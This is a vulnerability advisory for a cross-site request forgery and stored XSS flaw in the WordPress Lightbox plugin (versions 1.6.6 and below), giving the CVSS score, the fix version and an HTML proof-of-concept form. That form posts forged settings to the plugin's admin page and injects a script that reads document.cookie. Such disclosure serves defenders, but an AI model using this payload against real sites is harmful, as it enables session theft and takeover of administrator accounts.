Lightbox <= 1.6.6 CSRF Stored XSS

Homepage

https://wordpress.org/plugins/lightbox/

Overview

Due to a lack of CSRF mitigation and entity encoding in the output generated by /admin/view/huge_it_light_box.php , it is possible to store and execute scripts in the context of an admin user.

CVSS Score

4.8

CVSS Vector

(AV:N/AC:M/Au:N/C:P/I:P/A:N/E:F/RL:OF/RC:C)

Versions Affected

1.6.6 and below

Solution

Upgrade to version 1.6.8

Proof of Concept <form action="http://[target]/wp-admin/admin.php?page=huge_it_light_box&hugeit_task=save" method="post"> <input type="text" name="light_box_speed" value=""><script>alert(document.cookie)</script>"> <input type="text" name="light_box_style" value="1" /> <input type="text" name="light_box_transition" value="elastic" /> <input type="text" name="light_box_fadeout" value="300" /> <input type="text" name="light_box_title" value="false" /> <input type="text" name="params[light_box_opacity]" value="20" /> <input type="text" name="params[light_box_open]" value="false" /> <input type="text" name="params[light_box_overlayclose]" value="false" /> <input type="text" name="params[light_box_overlayclose]" value="true" /> <input type="text" name="params[light_box_esckey]" value="false" /> <input type="text" name="params[light_box_arrowkey]" value="false" /> <input type="text" name="params[light_box_loop]" value="false" /> <input type="text" name="params[light_box_loop]" value="true" /> <input type="text" name="params[light_box_closebutton]" value="false" /> <input type="text" name="params[light_box_closebutton]" value="true" /> <input type="text" name="params[light_box_fixed]" value="false" /> <input type="text" name="params[light_box_fixed]" value="true" /> <input type="text" name="params[slider_title_position]" value="5" /> <input type="text" name="params[light_box_size_fix]" value="false" /> <input type="text" name="params[light_box_width]" value="500" /> <input type="text" name="params[light_box_height]" value="500" /> <input type="text" name="params[light_box_maxwidth]" value="768" /> <input type="text" name="params[light_box_maxheight]" value="500" /> <input type="text" name="params[light_box_initialwidth]" value="300" /> <input type="text" name="params[light_box_initialheight]" value="100" /> <input type="text" name="params[light_box_slideshow]" value="false" /> <input type="text" name="params[light_box_slideshowspeed]" value="2500" /> <input type="text" name="params[light_box_slideshowauto]" value="false" /> <input type="text" name="params[light_box_slideshowauto]" value="true" /> <input type="text" name="params[light_box_slideshowstart]" value="start slideshow" /> <input type="text" name="params[light_box_slideshowstop]" value="stop slideshow" /> <input type="text" name="params[watermarket_image]" value="false" /> <input type="text" name="params[watermark_width]" value="0" /> <input type="text" name="params[watermark_transparency]" value="0" /> <input type="submit" value="submit"> </form>

Lightbox <= 1.6.6 CSRF Stored XSS

Trending Articles

《沈冰自述——我和周永康的故事》全本

Moog - Subsequent 25

出售: 林憶蓮•回來愛的身邊 (東芝1A1頭版)

筆記 - 使用 PowerShell 清除停用 AD 帳號與 OU

df-dferh-01 中国区 Android 安装 Google Play Store 后报错的解决办法

「一棒接一棒、棒棒強棒」108學年度家長會長交接典禮

吸烟与MBTI类型判断捷径 (豆瓣 INFJ的奇幻之旅小组)

acermark龍璿國際展出多款包裝設備

枋寮北勢寮隆山宮睽違12年再辦迎王祭典

日本女优有村千佳COS集锦：狂三&黑白岩&亚丝娜&绫波丽

有遇到过这个问题么。/jsb-videoplayer.js not found, possible missing file.

MAS v2.8 magicgenius 汉化版 - 11.11更新

出售: Monster Cable Interlink Reference 2

福建佛教人士望云和尚(林斌)的九仙禅寺被强行收走，望云妈妈被赶出寺庙

R 语言中的OpenBLAS*和英特尔® 数学核心函数库的性能比较

[转载]煞貢、直星、人專吉日\金神七煞歌

HAKERS哈克士戶外 12月8~14日廠拍

OBS Studio 23.2.1 免安裝中文版 - 免費網路實況廣播軟體實況主必備軟體取代Fraps

<請教>行駛中安卓機會重新開機

Udp2raw-tunnel 及其一键安装脚本